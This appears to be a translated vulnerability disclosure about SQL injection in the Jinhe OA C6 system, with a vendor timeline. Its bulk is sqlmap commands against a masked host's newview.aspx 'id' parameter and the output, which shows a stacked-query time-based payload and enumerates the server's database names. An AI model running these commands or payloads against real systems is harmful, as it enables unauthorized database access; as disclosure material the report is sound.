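2015-12-03: Details reported to the vendor; awaiting vendor response
2015-12-08: The vendor actively ignored the vulnerability; details disclosed to the public
Jinhe OA is to blame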
python sqlmap.py -u "http://**.**.**.**/c6/Jhsoft.Web.login/newview.aspx?id=1" --tamper tamper/space2comment.py
[11:55:58] [INFO] loading tamper script 'space2comment'
[11:55:58] [INFO] testing connection to the target URL
[11:55:58] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[11:55:58] [INFO] testing if the target URL is stable
[11:55:59] [INFO] target URL is stable
[11:55:59] [INFO] testing if GET parameter 'id' is dynamic
[11:55:59] [WARNING] GET parameter 'id' does not appear dynamic
[11:55:59] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[11:55:59] [INFO] testing for SQL injection on GET parameter 'id'
[11:55:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:56:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[11:56:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:56:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:56:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:56:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:56:04] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[11:56:05] [INFO] testing 'MySQL inline queries'
[11:56:05] [INFO] testing 'PostgreSQL inline queries'
[11:56:05] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[11:56:05] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[11:56:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[11:56:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[11:56:17] [INFO] GET parameter 'id' seems to be 'Microsoft SQL Server/Sybase stacked queries (comment)' injectable
it looks like the back-end DBMS is '['Microsoft SQL Server', 'Sybase']'. Do you want to skip test for the remaining tests, do you want to include all tests for '['Microsoft SQL Server', 'Sybase']' extending provided level (1) and risk (1) values? [Y/n]
[11:56:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:56:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:56:38] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[11:56:49] [INFO] heuristics detected web page charset 'utf-8'
[11:56:49] [WARNING] parameter length constrainting mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 85 HTTP(s) requests:
---
Parameter: id (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=1;WAITFOR DELAY '0:0:5'--
---
[11:57:21] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:57:21] [INFO] testing Microsoft SQL Server
[11:57:21] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[11:57:31] [INFO] confirming Microsoft SQL Server
[11:57:42] [INFO] adjusting time delay to 1 second due to good response times
[11:57:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
python sqlmap.py -u "http://**.**.**.**/c6/Jhsoft.Web.login/newview.aspx?id=1" --tamper tamper/space2comment.py --dbms mssql --table
[11:58:33] [INFO] loading tamper script 'space2comment'
[11:58:33] [INFO] testing connection to the target URL
[11:58:33] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=1;WAITFOR DELAY '0:0:5'--
---
[11:58:33] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:58:33] [INFO] testing Microsoft SQL Server
[11:58:33] [INFO] confirming Microsoft SQL Server
[11:58:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[11:58:33] [INFO] fetching database names
[11:58:33] [INFO] fetching number of databases
[11:58:33] [WARNING] time-based comparison requires larger statistical model, please wait.............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[11:58:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
7
[11:58:51] [INFO] retrieved:
[11:58:56] [INFO] adjusting time delay to 1 second due to good response times
C6
[11:59:04] [INFO] retrieved: master
[11:59:35] [INFO] retrieved: model
[12:00:04] [INFO] retrieved: msdb
[12:00:25] [INFO] retrieved: ReportServer
[12:01:29] [INFO] retrieved: ReportServerTempDB
[12:03:05] [INFO] retrieved: tempdb
You know this better than I do
Severity: No impact (ignored by vendor)
Ignored at: 2015-12-08 14:08
None yet